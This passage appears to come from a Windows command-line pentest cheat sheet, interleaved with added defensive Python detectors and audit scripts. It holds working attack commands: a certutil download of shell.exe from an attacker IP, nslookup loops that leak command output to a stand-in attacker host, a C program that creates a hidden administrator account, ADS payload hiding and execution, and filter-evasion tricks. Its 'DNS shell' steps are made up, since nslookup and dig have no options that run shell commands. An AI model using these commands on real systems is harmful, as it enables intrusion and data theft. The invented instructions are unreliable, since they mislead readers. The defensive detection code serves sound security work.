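State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound

Private Profile Settings:
----------------------------------------------------------------------
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound

Public Profile Settings:
----------------------------------------------------------------------
State                                 OFF
Firewall Policy                       BlockInbound,AllowOutbound

Ok.
"""

# Constructed sample output of `netsh advfirewall firewall show rule name=all` (abridged)
SAMPLE_RULES = """
Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Profiles:                             Domain,Private,Public
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             UDP
LocalPort:                            Any
RemotePort:                           53
Action:                               Allow

Rule Name:                            Remote Desktop
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             TCP
LocalPort:                            3389
RemotePort:                           Any
Action:                               Allow

Ok.
"""

PROFILE_HDR = re.compile(r"^(\w+) Profile Settings:")
# "Key:   value" or "Key   value": the key is separated from the value by two or more spaces
KV = re.compile(r"^([A-Za-z][A-Za-z ]*?):?\s{2,}(\S.*?)\s*$")

# Ports a workstation normally must not expose to arbitrary remote hosts (RDP, SMB, NetBIOS, WinRM)
WATCHED_PORTS = {"3389", "445", "139", "5985", "5986"}


def parse_profiles(text):
    """Return {profile: {setting: value}} from `show allprofiles` output."""
    profiles, current = {}, None
    for line in text.splitlines():
        h = PROFILE_HDR.match(line)
        if h:
            current = h.group(1)
            profiles[current] = {}
            continue
        kv = KV.match(line)
        if kv and current is not None:
            profiles[current][kv.group(1).strip()] = kv.group(2)
    return profiles


def parse_rules(text):
    """Return one {field: value} dict per rule from `show rule name=all` output."""
    rules, current = [], None
    for line in text.splitlines():
        kv = KV.match(line)
        if not kv:
            continue
        key, val = kv.group(1).strip(), kv.group(2)
        if key == "Rule Name":               # every rule block starts with its name
            current = {"Rule Name": val}
            rules.append(current)
        elif current is not None:
            current[key] = val
    return rules


def disabled_profiles(text):
    """Profiles whose firewall state is OFF (what `set allprofiles state off` produces)."""
    return sorted(p for p, s in parse_profiles(text).items() if s.get("State", "").upper() == "OFF")


def risky_inbound_rules(text, ports=WATCHED_PORTS):
    """Enabled inbound Allow rules that open a watched port to any remote address."""
    hits = []
    for r in parse_rules(text):
        if (r.get("Enabled") == "Yes" and r.get("Direction") == "In"
                and r.get("Action") == "Allow" and r.get("RemoteIP") == "Any"
                and r.get("LocalPort") in ports):
            hits.append((r["Rule Name"], r.get("Protocol"), r["LocalPort"]))
    return hits


if __name__ == "__main__":
    print("profiles OFF:", disabled_profiles(SAMPLE_PROFILES))
    print("risky inbound rules:", risky_inbound_rules(SAMPLE_RULES))
```

The RemoteIP check matters: an RDP rule scoped to a management subnet is normal, one scoped to Any on a workstation is the pattern the one-liner above creates.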

Shares

Introduction

Shares are a common feature in Windows systems that allow users to access files and folders over a network. As a pentester, it is important to understand how shares work and how they can be exploited during an attack.

Types of Shares

There are two main types of shares in Windows:

  1. Administrative Shares: These shares are created automatically by the operating system and are hidden from normal users. They have names that end with a dollar sign ($), such as C$ or ADMIN$. Administrative shares provide access to the root of each drive and are typically used for administrative tasks.

  2. Shared Folders: These shares are created by users or administrators and are visible to all users on the network. Shared folders can be used to share files and folders between users or groups.

Enumerating Shares

To gather information about the shares on a Windows system, you can use the net share command. This command will display a list of all the shares on the system, including their names and paths.

net share

Exploiting Shares

Once you have identified a share that you want to exploit, there are several techniques you can use:

  1. Brute-Force: If the share requires authentication, you can attempt to brute-force the credentials to gain access. This involves trying different username and password combinations until you find one that works.

  2. Null Session: Some shares may allow anonymous access, also known as a null session. This means that no username or password is required to access the share. You can use tools like nullinux or smbmap to enumerate and access null sessions.

  3. Misconfigured Permissions: In some cases, shares may have misconfigured permissions that allow unauthorized access. You can use tools like accesschk or icacls to check the permissions of a share and determine if there are any vulnerabilities.

Conclusion

Shares are a common feature in Windows systems that can be exploited during a pentest. By understanding how shares work and the different techniques for exploiting them, you can identify potential vulnerabilities and strengthen the security of your systems.

net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

Wifi

Introduction

Wifi, short for wireless fidelity, is a technology that allows devices to connect to a network wirelessly. It is commonly used for internet access in homes, offices, and public places. In this section, we will discuss some basic concepts and techniques related to wifi.

SSID

SSID stands for Service Set Identifier. It is the name of a wifi network. When you search for available wifi networks on your device, you will see a list of SSIDs. Each wifi network has a unique SSID, which is used to identify and differentiate it from other networks.

Encryption

Encryption is the process of converting data into a form that cannot be easily understood by unauthorized individuals. Wifi networks can be encrypted to protect the data transmitted over the network from being intercepted and accessed by unauthorized users. There are different encryption protocols available for wifi networks, such as WEP, WPA, and WPA2.

Password Cracking

Password cracking is the process of recovering passwords from stored or transmitted data. In the context of wifi networks, password cracking refers to the act of attempting to guess or crack the password of a wifi network in order to gain unauthorized access. This can be done using various techniques, such as brute-forcing, dictionary attacks, and rainbow table attacks.

Wifi Sniffing

Wifi sniffing is the act of capturing and analyzing network traffic on a wifi network. By sniffing wifi traffic, an attacker can intercept and view the data being transmitted over the network, including sensitive information such as usernames, passwords, and credit card numbers. This can be done using tools like Wireshark or tcpdump.

Wifi Jamming

Wifi jamming is the act of disrupting or disabling a wifi network by transmitting radio signals on the same frequency as the wifi network. This can be done using specialized hardware or software tools. Wifi jamming can be used for various purposes, such as preventing users from connecting to a network or causing denial of service (DoS) attacks.

Conclusion

Understanding the basic concepts and techniques related to wifi is essential for both hackers and network administrators. By knowing how wifi networks work and the vulnerabilities associated with them, you can better protect your own network and identify potential security risks.

netsh wlan show profile #AP SSID
netsh wlan show profile <SSID> key=clear #Get Cleartext Pass

SNMP

SNMP (Simple Network Management Protocol) is a widely used protocol for managing and monitoring network devices. It allows network administrators to collect information about the devices on their network, such as their status, performance, and configuration.

SNMP operates using a client-server model, where the SNMP manager (client) sends requests to the SNMP agent (server) running on the network device. The agent then responds with the requested information.

SNMP uses a hierarchical structure called the Management Information Base (MIB) to organize and represent the data it collects. The MIB contains a collection of objects, each with a unique identifier called an Object Identifier (OID). These objects represent various aspects of the network device, such as its interfaces, system information, and network statistics.

As a pentester, understanding SNMP can be useful for gathering information about a target network. By querying SNMP agents, you can discover valuable details about the network infrastructure, such as the devices connected, their configurations, and potentially even sensitive information if the SNMP agent is misconfigured.

There are several tools available for interacting with SNMP, such as snmpwalk, snmpget, and snmpset. These tools allow you to retrieve information from SNMP agents, manipulate their configurations, and even perform actions on the network devices.

When conducting a pentest, it's important to check if SNMP is enabled on the target network and if any default or weak community strings are being used. Community strings are like passwords that grant access to the SNMP agent. If weak or default community strings are found, an attacker could potentially gain unauthorized access to the network devices.

To protect against SNMP-based attacks, network administrators should follow best practices such as disabling SNMP if not needed, using strong community strings, and restricting SNMP access to trusted IP addresses.

Remember, always obtain proper authorization before performing any pentesting activities.

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
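The registry query above is what reveals community strings and their permissions on a Windows SNMP agent, so the same output is a good basis for an audit. This is an added example, not code from the HackTricks page: it parses constructed sample output of `reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s` and flags default community strings, communities with write access (ValidCommunities data 8 = READ CREATE, 16 = READ WRITE) and an empty PermittedManagers key, which means the agent accepts requests from any host. The community strings in the sample are constructed; the helper names are this example's own.

```python
import re

# Constructed sample output of `reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s` (abridged)
SAMPLE_SNMP = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP
    Type    REG_DWORD    0x10
    Start    REG_DWORD    0x2

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\PermittedManagers
    1    REG_SZ    localhost

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities
    public    REG_DWORD    0x4
    private    REG_DWORD    0x10
    s3cr3t-mon    REG_DWORD    0x4
"""

# Permission codes stored as the data of each ValidCommunities value
PERMISSIONS = {1: "NONE", 2: "NOTIFY", 4: "READ ONLY", 8: "READ CREATE", 16: "READ WRITE"}
DEFAULT_COMMUNITIES = {"public", "private"}


def parse_reg_query(text):
    """Generic parser for `reg query <key> /s`: {key: {value_name: (type, data)}}."""
    tree, current = {}, None
    for raw in text.splitlines():
        if raw.startswith("HKEY_"):
            current = raw.strip()
            tree[current] = {}
        elif raw.startswith("    ") and current is not None:
            parts = re.split(r"\s{4}", raw.strip())   # reg query separates columns with 4 spaces
            if len(parts) == 3:
                tree[current][parts[0]] = (parts[1], parts[2])
            elif len(parts) == 2:                      # value with empty data
                tree[current][parts[0]] = (parts[1], "")
    return tree


def find_key(tree, suffix):
    """Return the values of the first key whose path ends with suffix (case-insensitive), else None."""
    for key, values in tree.items():
        if key.lower().endswith(suffix.lower()):
            return values
    return None


def audit_snmp(text):
    """Return a list of (severity, finding) tuples for the SNMP agent configuration."""
    tree = parse_reg_query(text)
    findings = []
    communities = find_key(tree, "\\Parameters\\ValidCommunities") or {}
    for name, (_kind, data) in communities.items():
        perm = int(data, 16) if data.lower().startswith("0x") else int(data)
        label = PERMISSIONS.get(perm, "unknown(%d)" % perm)
        if name.lower() in DEFAULT_COMMUNITIES:
            findings.append(("HIGH", "default community string '%s' (%s)" % (name, label)))
        if perm in (8, 16):
            findings.append(("HIGH", "community '%s' grants write access (%s)" % (name, label)))
    managers = find_key(tree, "\\Parameters\\PermittedManagers")
    if not managers:
        findings.append(("MEDIUM", "no PermittedManagers entries: agent accepts requests from any host"))
    service = find_key(tree, "\\Services\\SNMP")
    if service and service.get("Start", ("", ""))[1] == "0x2":
        findings.append(("INFO", "SNMP service start type is Automatic"))
    return findings


if __name__ == "__main__":
    for severity, finding in audit_snmp(SAMPLE_SNMP):
        print(severity, finding)
```

The same parser works for any `reg query /s` dump, so it can be reused for the other registry checks on this page (Winlogon, Terminal Server) by changing the key suffix passed to find_key.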

Network Interfaces

ipconfig /all


ARP Table

The Address Resolution Protocol (ARP) is a protocol used to map an IP address to a physical MAC address on a local network. The ARP table, also known as the ARP cache, is a table that stores the mappings between IP addresses and MAC addresses.

To view the ARP table on a Windows system, you can use the arp command in the command prompt. Here's how you can do it:

C:\> arp -a

This command will display the ARP table, showing the IP addresses and corresponding MAC addresses of the devices on the local network.

It's important to note that the ARP table can be manipulated by attackers to perform ARP spoofing attacks, where they impersonate other devices on the network. Therefore, it's crucial to regularly monitor the ARP table and be aware of any suspicious entries.

arp -A

Download

Bitsadmin.exe

bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1

CertReq.exe

CertReq.exe is a command-line tool used for certificate enrollment and management in Windows operating systems. It allows users to create certificate requests, submit them to a certification authority (CA), and retrieve issued certificates. CertReq.exe supports various operations such as generating key pairs, creating certificate signing requests (CSRs), and installing certificates. It is commonly used by system administrators and security professionals for managing digital certificates in Windows environments.

CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt

Certutil.exe

Certutil.exe is a command-line utility in Windows that is used to manage certificates. It provides various functions for working with certificates, such as installing, exporting, and verifying them.

Usage

To use Certutil.exe, open a command prompt and type certutil followed by the desired command and its parameters.

Examples

  • Viewing certificate details:
certutil -dump <certificate_file>
  • Exporting a certificate:
certutil -exportPFX -p <password> -f <certificate_file> <output_file>
  • Installing a certificate:
certutil -addstore <store_name> <certificate_file>
  • Verifying a certificate:
certutil -verify <certificate_file>

Conclusion

Certutil.exe is a powerful tool for managing certificates in Windows. It provides a wide range of functions that can be useful for various certificate-related tasks.

certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe

See the Download section of https://lolbas-project.github.io for more binaries that can be used this way.
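Because bitsadmin, certreq and certutil are signed Windows binaries, the only reliable way to spot them being used as downloaders is the command line. The following is an added example, not code from the HackTricks page or from LOLBAS: it runs simple command-line rules over a constructed list of process-creation events (image path plus command line, the two fields any EDR or Sysmon Event ID 1 record provides) and extracts the URL involved. The rule set covers exactly the three invocations shown above; the event list and helper names are this example's own.

```python
import re

# Constructed sample events: (process image, command line), as a process-creation log records them.
# The three download/upload command lines are the ones shown on this page; the others are benign noise.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\certutil.exe",
     'certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe'),
    ("C:\\Windows\\System32\\certutil.exe",
     "certutil -verify C:\\certs\\server.cer"),
    ("C:\\Windows\\System32\\bitsadmin.exe",
     "bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\\data\\playfolder\\autoruns.exe"),
    ("C:\\Windows\\System32\\certreq.exe",
     "CertReq -Post -config https://example.org/ c:\\windows\\win.ini output.txt"),
    ("C:\\Windows\\System32\\cmd.exe", "cmd /c dir"),
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# (binary name, switch that marks the download/upload use, description)
RULES = [
    ("certutil.exe", "-urlcache", "certutil used as a downloader (-urlcache)"),
    ("bitsadmin.exe", "-addfile", "bitsadmin job used to fetch a file (/addfile)"),
    ("certreq.exe", "-post", "certreq used to POST a local file to a web server (-Post)"),
]


def normalize_tokens(cmdline):
    """Lower-case the command line and treat '/switch' and '-switch' as the same switch."""
    toks = []
    for t in cmdline.lower().split():
        if t.startswith("/"):
            t = "-" + t[1:]
        toks.append(t)
    return toks


def classify(image, cmdline):
    """Return (description, url-or-None) when the event matches a rule, else None."""
    binary = image.lower().rsplit("\\", 1)[-1]
    toks = normalize_tokens(cmdline)
    for name, switch, desc in RULES:
        if binary == name and switch in toks:
            m = URL_RE.search(cmdline)
            return desc, (m.group(0) if m else None)
    return None


def scan(events):
    """Run every event through classify() and return hits as (binary, description, url)."""
    hits = []
    for image, cmdline in events:
        result = classify(image, cmdline)
        if result:
            desc, url = result
            hits.append((image.rsplit("\\", 1)[-1].lower(), desc, url))
    return hits


if __name__ == "__main__":
    for binary, desc, url in scan(SAMPLE_EVENTS):
        print(binary, "|", desc, "|", url)
```

Matching on the image path rather than the first token of the command line matters because the binary can be copied and renamed; the reverse (a renamed copy of certutil) needs a hash- or original-filename-based rule that this example does not attempt.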

Misc

cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list of bare paths only
time #Get current time
date #Get current date
shutdown /r /t 0 #Shutdown now
type <file> #Cat file

#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Hide
attrib +h file #Set Hidden
attrib -h file #Remove Hidden

#Give full control over a file that you own
icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #Remove the permission

#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win

#exe2bat to transform an exe file into a bat file

#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)

# Get error messages from code
net helpmsg 32 #32 is the code in that case

Bypass Char Blacklisting


echo %HOMEPATH:~6,-11%   #\
who^ami   #whoami

DOSfuscation

Generates an obfuscated CMD line

git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
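The two tricks in the previous section (carving a character out of an environment variable with `%VAR:~start,len%` and splitting a keyword with `^`) are the building blocks DOSfuscation chains together, and a detection pipeline has to undo them before keyword matching can work. This is an added example, not code from the HackTricks page or from Invoke-DOSfuscation: it normalises a cmd.exe command line by expanding `%VAR%` / `%VAR:~start,len%` against a known environment (here a constructed, hypothetical one) and then removing escape carets outside double quotes, in that order, which is the order cmd.exe itself applies them. The environment values and helper names are this example's own.

```python
import re

# Constructed environment for the sample host; real telemetry would carry the process's own environment.
SAMPLE_ENV = {
    "HOMEPATH": r"\Users\pentester01",                # 18 chars, so ~6,-11 yields the single "\" at index 6
    "COMSPEC": r"C:\Windows\System32\cmd.exe",
}

# %VAR:~start%  or  %VAR:~start,len%   (either number may be negative)
SUBSTR_RE = re.compile(r"%(\w+):~(-?\d+)(?:,(-?\d+))?%")
PLAIN_RE = re.compile(r"%(\w+)%")


def expand_variables(cmd, env):
    """Expand %VAR% and substring forms with cmd.exe semantics; unknown variables are left as-is."""
    def substring(m):
        name, start, length = m.group(1), int(m.group(2)), m.group(3)
        val = env.get(name.upper())
        if val is None:
            return m.group(0)
        n = len(val)
        s = n + start if start < 0 else start       # negative start counts from the end
        s = max(0, min(s, n))
        if length is None:
            e = n
        else:
            length = int(length)
            e = n + length if length < 0 else s + length   # negative len = stop that many chars before the end
        return val[s:max(s, min(e, n))]

    cmd = SUBSTR_RE.sub(substring, cmd)
    return PLAIN_RE.sub(lambda m: env.get(m.group(1).upper(), m.group(0)), cmd)


def strip_carets(cmd):
    """Remove escape carets outside double quotes (who^ami -> whoami); carets inside quotes are literal."""
    out, in_quotes, i = [], False, 0
    while i < len(cmd):
        ch = cmd[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes:
            if i + 1 < len(cmd):
                out.append(cmd[i + 1])              # the escaped character is taken literally
                i += 1
            # a caret at the very end (line continuation) is simply dropped
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def deobfuscate(cmd, env=SAMPLE_ENV):
    """Variable expansion first, then caret removal: the order cmd.exe uses."""
    return strip_carets(expand_variables(cmd, env))


def looks_obfuscated(cmd, env=SAMPLE_ENV):
    """True when normalisation changed the command line, i.e. it used carets or variable slicing."""
    return deobfuscate(cmd, env) != cmd


if __name__ == "__main__":
    for sample in ("who^ami", "echo %HOMEPATH:~6,-11%", "%COMSPEC:~-7,3% /c p^o^w^e^r^s^h^e^l^l"):
        print(sample, "->", deobfuscate(sample))
```

Run the normalised string, not the raw one, through whatever keyword or Sigma-style rules you already have; the raw line `who^ami` never contains the substring `whoami`.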

Listen address ACLs

You can listen on http://+:80/Temporary_Listen_Addresses/ without being administrator.

netsh http show urlacl

Manual DNS shell

Attacker (Kali) must use one of these 2 options:

Option 1: Using nslookup

The nslookup command can be used to manually perform DNS queries and interact with the DNS server. To start a DNS shell, the attacker can follow these steps:

  1. Open a terminal in Kali.
  2. Run the nslookup command followed by the target domain or IP address.
  3. Use the set type=txt command to set the query type to TXT records.
  4. Use the server <DNS_IP> command to specify the DNS server to use.
  5. Use the ls -d <shell_command> command to execute shell commands. Replace <shell_command> with the desired command.
  6. The output of the shell command will be displayed in the terminal.

Option 2: Using dig

The dig command is another option to manually interact with the DNS server and perform DNS queries. To establish a DNS shell, the attacker can follow these steps:

  1. Open a terminal in Kali.
  2. Run the dig command followed by the target domain or IP address.
  3. Use the +short option to display only the answer section of the DNS response.
  4. Use the +tcp option to force the use of TCP instead of UDP.
  5. Use the +ignore option to ignore the DNS server's response and send the query directly to the target IP address.
  6. Use the +cmd option to execute shell commands. Append the desired command after the +cmd option.
  7. The output of the shell command will be displayed in the terminal.

sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive

Victim

for /f tokens technique: this lets us execute commands, take the first X words of each output line and send them through DNS to our server.

for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Send the first 9 words of each enabled-privilege line

You can also redirect the output to a file and then read it:

whoami /priv | findstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
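The `for /f ... do nslookup %a.%b.%c <IP_kali>` loop has two properties a defender can key on: every query goes straight to an address that is not one of the organisation's resolvers, and the "hostnames" are command output, so they often contain characters that are not legal in a hostname (`\`, `(`, `:`). This is an added example, not code from the HackTricks page: it runs those checks over constructed DNS query log lines (client, server and query name, the fields any resolver or network sensor log provides) and counts, per client, how many queries went to a non-approved resolver. The resolver addresses, log format and helper names are this example's own; 10.11.1.49 is reused from this page as the constructed attacker address.

```python
import re

# Constructed: the organisation's approved internal resolvers
ALLOWED_RESOLVERS = {"10.0.0.2", "10.0.0.3"}

# Constructed sample DNS query log: "<time> <client> -> <server> <qname>"
SAMPLE_LOG = """
12:00:01 10.0.5.17 -> 10.0.0.2 login.microsoftonline.com
12:00:02 10.0.5.17 -> 10.0.0.2 outlook.office365.com
12:00:05 10.0.5.17 -> 10.11.1.49 desktop-7k2\\alice
12:00:06 10.0.5.17 -> 10.11.1.49 SeDebugPrivilege.Debug.programs.Enabled
12:00:07 10.0.5.17 -> 10.11.1.49 Program.Files.(x86)
12:00:09 10.0.5.22 -> 10.0.0.3 cdn-a3f9c.example-media.net
"""

LOG_RE = re.compile(r"^(\S+) (\S+) -> (\S+) (\S+)$")
LABEL_OK = re.compile(r"^[a-z0-9_-]+$")     # underscore kept legal for SRV-style names


def parse_log(text):
    """Return (time, client, server, qname) tuples for every well-formed line."""
    rows = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            rows.append(m.groups())
    return rows


def query_findings(server, qname):
    """Reasons a single query is suspicious; empty list means nothing noteworthy."""
    reasons = []
    if server not in ALLOWED_RESOLVERS:
        reasons.append("sent to non-approved resolver " + server)
    if any(not LABEL_OK.match(label) for label in qname.lower().split(".")):
        reasons.append("contains characters not valid in a hostname")
    if len(qname) > 60:
        reasons.append("unusually long name (%d chars)" % len(qname))
    return reasons


def scan_log(text):
    """Return (client, qname, reasons) for every flagged query."""
    flagged = []
    for _time, client, server, qname in parse_log(text):
        reasons = query_findings(server, qname)
        if reasons:
            flagged.append((client, qname, reasons))
    return flagged


def rogue_resolver_clients(text):
    """Per-client count of queries that bypassed the approved resolvers."""
    counts = {}
    for _time, client, server, _qname in parse_log(text):
        if server not in ALLOWED_RESOLVERS:
            counts[client] = counts.get(client, 0) + 1
    return counts


if __name__ == "__main__":
    for client, qname, reasons in scan_log(SAMPLE_LOG):
        print(client, qname, "|", "; ".join(reasons))
    print(rogue_resolver_clients(SAMPLE_LOG))
```

The resolver check is the strong signal: outbound UDP/TCP 53 from workstations to anything but the approved resolvers is easy to block at the egress firewall, which removes this channel entirely rather than just detecting it.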

Call CMD from C code

To call CMD from C code, you can use the system() function provided by the C standard library. This function allows you to execute a command in the command prompt.

Here is an example of how you can call CMD from C code:

#include <stdlib.h>

int main() {
    system("cmd /c <command>");
    return 0;
}

Replace <command> with the command you want to execute in CMD. The /c flag is used to execute the command and then terminate CMD.

Compile and run the C code, and it will execute the specified command in CMD. Make sure to handle any output or errors that may be generated by the command.

#include <stdlib.h>     /* system, NULL, EXIT_FAILURE */

// When executed by an Administrator this program creates a user and then adds it to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe

int main(void) {
    int i;
    i = system("net users otherAcc 0TherAcc! /add");
    i = system("net localgroup administrators otherAcc /add");
    (void)i;   // exit codes of the net commands are not checked
    return 0;
}

Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)

Examples taken from https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f. There are a lot more in there!

## Selected Examples of ADS Operations ##

### Adding Content to ADS ###
# Append executable to a log file as an ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
# Download a script directly into an ADS
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

### Discovering ADS Content ###
# List files and their ADS
dir /R
# Use Sysinternals tool to list ADS of a file
streams.exe <c:\path\to\file>

### Extracting Content from ADS ###
# Extract an executable stored in an ADS
expand c:\ads\file.txt:test.exe c:\temp\evil.exe

### Executing ADS Content ###
# Execute an executable stored in an ADS using WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
# Execute a script stored in an ADS using PowerShell
powershell -ep bypass - < c:\temp:ttt
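`dir /R` is the cheapest way to enumerate streams, and its output is easy to post-process on a collection of hosts. This is an added example, not code from the HackTricks page or from the linked gist: it parses constructed `dir /R` output, ignores the Zone.Identifier stream that Mark-of-the-Web legitimately adds to downloaded files, and flags any other stream that has an executable or script extension or is large enough to hold a payload. The directory listing, size threshold and helper names are this example's own.

```python
import re

# Constructed sample output of `dir /R C:\temp`
SAMPLE_DIR_R = r"""
 Volume in drive C has no label.
 Volume Serial Number is 1234-ABCD

 Directory of C:\temp

02/10/2024  05:52 PM    <DIR>          .
02/10/2024  05:52 PM    <DIR>          ..
02/10/2024  05:52 PM                12 file.txt
                                 73216 file.txt:test.exe:$DATA
02/10/2024  05:52 PM            102400 installer.msi
                                    26 installer.msi:Zone.Identifier:$DATA
02/10/2024  05:52 PM                 0 notes.md
               3 File(s)        102412 bytes
               2 Dir(s)  50,000,000,000 bytes free
"""

DIR_HDR = re.compile(r"^ Directory of (.+)$")
# Stream lines are indented, carry only a size, and end in ":<stream>:$DATA"
STREAM_LINE = re.compile(r"^\s+([\d,]+) (.+?):([^:]+):\$DATA$")

BENIGN_STREAMS = {"zone.identifier"}                         # Mark-of-the-Web
SUSPICIOUS_EXT = (".exe", ".dll", ".ps1", ".bat", ".vbs", ".js")
SIZE_THRESHOLD = 4096                                         # bytes; MOTW streams are tens of bytes


def parse_streams(text):
    """Return (directory, file, stream, size) for every ADS in `dir /R` output."""
    streams, directory = [], None
    for line in text.splitlines():
        h = DIR_HDR.match(line)
        if h:
            directory = h.group(1)
            continue
        s = STREAM_LINE.match(line)
        if s and directory is not None:
            size = int(s.group(1).replace(",", ""))
            streams.append((directory, s.group(2), s.group(3), size))
    return streams


def suspicious_streams(text):
    """Non-MOTW streams that look like payloads, as (full path, reasons)."""
    hits = []
    for directory, name, stream, size in parse_streams(text):
        if stream.lower() in BENIGN_STREAMS:
            continue
        reasons = []
        if stream.lower().endswith(SUSPICIOUS_EXT):
            reasons.append("executable or script extension")
        if size >= SIZE_THRESHOLD:
            reasons.append("size %d bytes" % size)
        if reasons:
            hits.append((directory + "\\" + name + ":" + stream, reasons))
    return hits


if __name__ == "__main__":
    for path, reasons in suspicious_streams(SAMPLE_DIR_R):
        print(path, "|", "; ".join(reasons))
```

A stream name is only a hint (nothing stops an attacker from calling it `notes.txt`), which is why the size check is kept as an independent reason; on a real host follow up with `more <file>:<stream>` or the Sysinternals streams tool on anything reported.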